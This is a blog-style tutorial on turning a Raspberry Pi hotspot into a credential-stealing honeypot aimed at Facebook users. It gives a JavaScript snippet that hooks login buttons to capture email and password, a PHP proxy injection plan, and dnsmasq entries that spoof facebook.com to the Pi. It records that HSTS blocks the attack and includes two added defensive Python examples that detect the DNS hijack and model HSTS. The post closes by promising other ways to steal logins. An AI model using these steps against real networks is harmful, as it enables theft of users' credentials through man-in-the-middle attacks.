Make a Wi-Fi honeypot with Raspberry Pi 3 (and get blocked by HSTS)

After following the previous post explaining how to turn your Raspberry Pi 3 into a Wi-Fi hotspot, we will now show you different pieces of code that can turn it into a nasty curious box.

Step 1 – Prepare your malicious JavaScript

A small JavaScript to get the login and password

We will modify some Facebook pages on the fly to inject our homemade JavaScript, which modifies the DOM of the page after it has loaded. Our piece of JavaScript looks for all “submit” buttons in a form and adds an action that fires when the user clicks one:

var x = document.getElementsByTagName("input");
// Index loop: "for (i in x)" would also visit the collection's "length"/"item"
// properties, which have no getAttribute() and make the script throw.
for (var i = 0; i < x.length; i++) {
    if (x[i].getAttribute("type") == "submit") {
        alert("I found a button '" + x[i].value + "'");
        x[i].setAttribute("onclick","javascript:alert('login:'+document.getElementById('email').value+'|password:'+document.getElementById('pass').value);");
    }
}

First we will test this script directly on the Facebook login page. To do this, add a new bookmark in your web browser: name it TestJS and, for the URL, type javascript: followed by the piece of code above. It should look like this:

[Screenshot: javascript-bookmark]

Go to http://www.facebook.com (be sure to be logged out). If you inspect the Log In button you can see the following:

Run the script from your bookmarks: you can see that it works when the alert message “found button >> Log In” shows up. After that, you will also notice that the code of the Log In button has changed in the inspector. If you click the button, a new alert shows the content of the login and password fields:


You can then modify the script so that it calls another PHP script which stores the hijacked login and password in a log file on our nginx server (with an AJAX request, for instance).

Inject the script into some pages with a simple PHP proxy

We will use PHP and curl to fetch the content of the Facebook page and write it back out unchanged. Well, unchanged except for some pages, which will receive the extra piece of JavaScript presented above.

To do this, we start by installing PHP 5 for nginx and the curl extension as follows:

pi@raspberrypi:~ $ sudo apt-get update
pi@raspberrypi:~ $ sudo apt-get install php5-curl php5-fpm

Note that you will need to configure the nginx service to use php-fpm by having the following lines in /etc/nginx/sites-available/default:

location ~ \.php$ {
    try_files $uri =404;
    fastcgi_split_path_info ^(.+\.php)(/.+)$;
    fastcgi_pass unix:/run/php5-fpm.sock;
    fastcgi_index index.php;
    include fastcgi.conf;
    include fastcgi_params;
}

Then we will use https://github.com/joshdick/miniProxy/blob/master/miniProxy.php, a simple PHP proxy script that we will modify later. For now, just test it manually to make sure it works: for instance, try http://172.16.0.1/miniProxy.php?https://www.linkedin.com/.

Step 2 – Redirect specific sites to our own webserver

We want to catch every request to Facebook in order to perform a man-in-the-middle attack that injects the JavaScript tested above. To do that, we edit the configuration of our DNS server:

pi@raspberrypi:~ $ sudo vim /etc/dnsmasq.conf

We tell it to read a specific hosts file, in which we will capture the Facebook names, by adding the following lines:

no-hosts
addn-hosts=/var/run/dnsmasq/hosts

Then we create that new hosts file:

pi@raspberrypi:~ $ sudo vim /var/run/dnsmasq/hosts

And we put the following content in it:

127.0.0.1       honey.pot
172.16.0.1      www.facebook.com
172.16.0.1      m.facebook.com
172.16.0.1      facebook.com

Restart the dnsmasq service and check the result:

[Screenshot: nslookup output]
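From the client side, the hosts file above leaves a very recognisable trace: well-known public names suddenly resolve to the access point itself, or into a private range. The following script is an added example (not code from the original post) that applies those two checks to a set of DNS answers. The answer set is constructed to mirror the hosts file above; 203.0.113.10 is a placeholder for a normal public answer, and the resolver address 172.16.0.1 is the Pi's address from this post.

```python
"""Flag DNS answers that point public hostnames at the hotspot itself.

Added example, not part of the original post. SAMPLE_ANSWERS is constructed to
mirror the dnsmasq hosts file above; 203.0.113.10 is a placeholder public address.
"""
import ipaddress

# Ranges a public web site should never resolve to from a client's point of view.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "::1/128", "fc00::/7", "fe80::/10",                # IPv6 equivalents
)]

# Constructed answers, as a client of the rogue hotspot would receive them.
SAMPLE_ANSWERS = {
    "www.facebook.com": ["172.16.0.1"],
    "m.facebook.com": ["172.16.0.1"],
    "facebook.com": ["172.16.0.1"],
    "www.example.org": ["203.0.113.10"],   # placeholder for a genuine public answer
}


def is_non_routable(addr):
    """True when addr falls in a private, loopback or link-local range."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in NON_ROUTABLE)


def check_answers(answers, resolver):
    """Return (hostname, address, reason) findings for suspicious answers.

    Two signatures of the setup described in this post:
      * a public name resolves to the resolver/gateway address itself, which is
        how the Pi ends up serving the rewritten page on 172.16.0.1;
      * a public name resolves into a non-routable range at all.
    """
    findings = []
    resolver_ip = ipaddress.ip_address(resolver)
    for host, addrs in answers.items():
        for addr in addrs:
            if ipaddress.ip_address(addr) == resolver_ip:
                findings.append((host, addr, "answer is the DNS resolver itself"))
            elif is_non_routable(addr):
                findings.append((host, addr, "public name in non-routable range"))
    return findings


def hijacked_hosts(answers, resolver):
    """Just the hostnames that tripped a check, sorted for stable output."""
    return sorted({host for host, _, _ in check_answers(answers, resolver)})


def live_answers(hostnames):
    """Collect answers from the system resolver for the hostnames given (not used offline)."""
    import socket
    return {h: sorted({info[4][0] for info in socket.getaddrinfo(h, 443)})
            for h in hostnames}


if __name__ == "__main__":
    for host, addr, why in check_answers(SAMPLE_ANSWERS, resolver="172.16.0.1"):
        print(f"{host:20} -> {addr:15} {why}")
```

On a real client you would feed `live_answers([...])` plus the resolver address handed out by DHCP into `check_answers`; a public site answering with the gateway's own address is the tell-tale sign of a captive portal or of a redirect like the one configured here.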

Step 3 – Manage SSL connections

This is the tricky part: Facebook uses SSL to encrypt all its traffic, so we need to enable SSL on our web server to handle it. Follow this well-explained tutorial to enable SSL on the Nginx web server:

Once done, verify that the HTTPS port is open with:

sudo netstat -a | grep "LISTEN"

[Screenshot: netstat output]

Perfect. Now let’s test the redirection.

Step 4 – Test the DNS spoofing we just configured

Let’s test the access to Facebook by entering in the browser:

http://www.facebook.com (mind the absence of https, which is important)

We get this result:

[Screenshot: hsts]

What happened? We entered the URL without https; however, Chrome force-redirected us to the SSL version of the URL before contacting our DNS service. Only then did the request reach our nginx web server, and since its certificate is not legitimate, we get this warning message and cannot continue. – FAIL!

Facebook has implemented HTTP Strict Transport Security (HSTS), which tells Chrome that facebook.com may only be accessed over SSL; in other words, any attempt to access it using http will automatically be changed by the web browser.

It works in two ways, the most usual being to send an extra header that the web browser stores for a certain time, like a cookie:

Strict-Transport-Security: max-age=31536000

The other way, for major websites, is to get listed in the STS preload list (chrome://net-internals/#hsts), so that even the first access to the website cannot be hijacked.
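The two mechanisms just described are easy to model, and doing so makes clear why the http:// URL never reached the Pi's DNS server. The script below is an added example (not code from the original post): it parses a Strict-Transport-Security header the way RFC 6797 requires, checks it against the hstspreload.org submission rules (one year max-age, includeSubDomains, preload), and then decides, from a small cache of learned policies plus a constructed stand-in for the browser's preload list, whether a given http:// URL gets rewritten to https:// before any network request is made. The PRELOADED set is an assumption for illustration; the real list is the one visible at chrome://net-internals/#hsts.

```python
"""Model of how a browser upgrades http:// to https:// under HSTS (RFC 6797).

Added example, not code from the original post. PRELOADED is a constructed
stand-in for Chrome's built-in list; consult chrome://net-internals/#hsts or
https://hstspreload.org/ for the real one.
"""
import time
from urllib.parse import urlsplit, urlunsplit

# Constructed stand-in for the browser's built-in preload list (assumption).
PRELOADED = {"facebook.com": {"include_subdomains": True}}

# Minimum max-age hstspreload.org requires for submission: one year in seconds.
PRELOAD_MIN_MAX_AGE = 31536000


def parse_hsts(value):
    """Parse a Strict-Transport-Security header value (RFC 6797 section 6.1).

    Returns {"max_age", "include_subdomains", "preload"}, or None when the header
    is invalid (max-age missing or malformed, or a directive repeated); a
    conforming browser ignores an invalid header entirely.
    """
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    seen = set()
    for raw in value.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, arg = directive.partition("=")
        name = name.strip().lower()
        if name in seen:                      # a directive MUST NOT appear twice
            return None
        seen.add(name)
        if name == "max-age":
            arg = arg.strip()
            if len(arg) >= 2 and arg[0] == arg[-1] == '"':   # quoted form allowed
                arg = arg[1:-1]
            if not arg.isdigit():
                return None
            policy["max_age"] = int(arg)
        elif name == "includesubdomains":     # directive names are case-insensitive
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
        # unknown directives are ignored, as the RFC requires
    if policy["max_age"] is None:
        return None
    return policy


def preload_eligible(policy):
    """True when the header meets hstspreload.org's submission requirements."""
    return bool(policy is not None
                and policy["max_age"] >= PRELOAD_MIN_MAX_AGE
                and policy["include_subdomains"]
                and policy["preload"])


def remember(store, host, policy, now=None):
    """Update the browser's HSTS cache from a response header (section 8.1).

    store maps host -> (expiry_epoch, include_subdomains); max-age=0 tells the
    browser to forget the host.
    """
    if policy is None:
        return
    now = time.time() if now is None else now
    if policy["max_age"] == 0:
        store.pop(host, None)
    else:
        store[host] = (now + policy["max_age"], policy["include_subdomains"])


def _covered(host, known_host, include_subdomains):
    return host == known_host or (include_subdomains and host.endswith("." + known_host))


def upgrade_url(url, store, now=None):
    """Return the URL the browser will actually request.

    http:// is rewritten to https:// when the host is covered either by the
    preload list (no first visit needed) or by an unexpired learned policy.
    """
    now = time.time() if now is None else now
    parts = urlsplit(url)
    if parts.scheme != "http":
        return url
    host = parts.hostname or ""
    for known, entry in PRELOADED.items():
        if _covered(host, known, entry["include_subdomains"]):
            return urlunsplit(("https",) + tuple(parts[1:]))
    for known, (expiry, subs) in store.items():
        if expiry > now and _covered(host, known, subs):
            return urlunsplit(("https",) + tuple(parts[1:]))
    return url


if __name__ == "__main__":
    print(upgrade_url("http://www.facebook.com/", {}))   # rewritten by the preload entry
    print(upgrade_url("http://example.org/", {}))        # no policy known: stays http
```

The first print shows exactly what happened in the test above: the rewrite to https:// comes from the preload entry, so the browser never issues the plain-http request that the DNS redirect and the PHP proxy were waiting for. The second shows the case the post warns about at the end: a site with neither a cached policy nor a preload entry is fetched over http as typed.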

So our attempt to create a simple MITM attack against Facebook fails here thanks to this combination of SSL and HSTS with the preload list. However, you can already see how simple it is to change the content of a website that does not implement SSL or HSTS, and there are a lot of such websites around.

We will not give up yet. With all the pieces of code tested here, in a next article we will demonstrate another way to steal logins and passwords from people who use our dirty access point.
